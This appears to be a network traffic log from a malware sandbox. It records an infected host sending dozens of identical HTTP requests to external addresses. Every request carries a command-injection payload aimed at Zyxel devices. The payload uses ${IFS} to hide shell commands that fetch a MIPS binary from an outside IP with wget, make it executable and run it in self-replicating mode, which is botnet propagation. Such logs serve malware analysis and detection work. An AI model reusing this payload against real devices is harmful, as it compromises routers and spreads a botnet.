                                                      Feb 2, 2024 06:35:52.609224081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4239192.168.2.144712667.227.199.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609272003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4240192.168.2.143283436.10.206.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609309912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4241192.168.2.1458116199.42.204.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609349012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4242192.168.2.1448186177.46.176.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609379053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4243192.168.2.1445232115.48.172.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609400988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4244192.168.2.143372648.72.251.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609426975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4245192.168.2.1460014223.37.148.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609478951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4246192.168.2.1454836187.53.27.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609515905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4247192.168.2.144540831.255.139.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609580040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4248192.168.2.144579694.26.67.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609610081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4249192.168.2.1444650137.173.120.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609638929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4250192.168.2.143719674.76.38.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609687090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4251192.168.2.1439650115.238.151.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609719992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4252192.168.2.144191425.185.164.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609780073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4253192.168.2.1458058138.129.46.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609800100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4254192.168.2.1435002179.73.240.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609834909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4255192.168.2.1458998171.70.67.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609890938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4256192.168.2.144142653.193.220.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609922886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4257192.168.2.145368239.243.73.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609958887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4258192.168.2.1433874139.204.8.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609983921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4259192.168.2.145530867.20.48.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610043049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4260192.168.2.1439054159.228.36.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610081911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4261192.168.2.1449592162.251.80.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610120058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4262192.168.2.1444428181.159.113.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610183954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4263192.168.2.145197476.45.109.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610209942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4264192.168.2.14508725.63.20.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610289097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4265192.168.2.1445228114.130.70.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610289097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4266192.168.2.1437246123.113.41.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610342979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4267192.168.2.145886444.206.83.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610378027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4268192.168.2.1442654218.190.249.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610429049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4269192.168.2.1450198114.24.187.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610461950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4270192.168.2.1447750190.229.181.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610496998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4271192.168.2.144373250.51.152.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610537052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4272192.168.2.1435468171.134.233.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610590935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4273192.168.2.1449070159.247.31.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610620022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4274192.168.2.1455650147.189.90.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610658884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4275192.168.2.145135877.242.131.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610704899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4276192.168.2.1446708136.60.251.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610733986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4277192.168.2.1451312133.30.227.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610761881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4278192.168.2.1457964104.82.126.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610809088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4279192.168.2.1436934190.123.238.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610841990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4280192.168.2.1435874144.238.187.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610863924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4281192.168.2.1451166164.6.142.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610904932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4282192.168.2.1444508147.51.222.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610941887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4283192.168.2.144627471.179.87.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.610971928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4284192.168.2.1460152206.224.25.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611023903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4285192.168.2.1449834194.73.1.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611054897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4286192.168.2.1434194186.128.207.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611085892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4287192.168.2.1459258191.253.125.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611133099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4288192.168.2.1455272132.153.83.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611170053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4289192.168.2.1432816144.27.195.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611215115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4290192.168.2.1448794220.245.229.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611270905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4291192.168.2.1441834220.148.185.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611321926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4292192.168.2.1433378179.12.51.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611361980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4293192.168.2.1440432167.241.232.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611398935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4294192.168.2.1433384169.231.165.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611448050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4295192.168.2.1447960180.80.14.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611505985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4296192.168.2.145917083.14.2.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611541986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4297192.168.2.1458690184.183.7.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611567974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4298192.168.2.143860018.132.57.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611629963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4299192.168.2.1455084195.50.33.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611680031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4300192.168.2.1448010115.167.43.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611720085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4301192.168.2.1446414182.251.126.30443
                                                      TimestampBytes transferredDirectionData
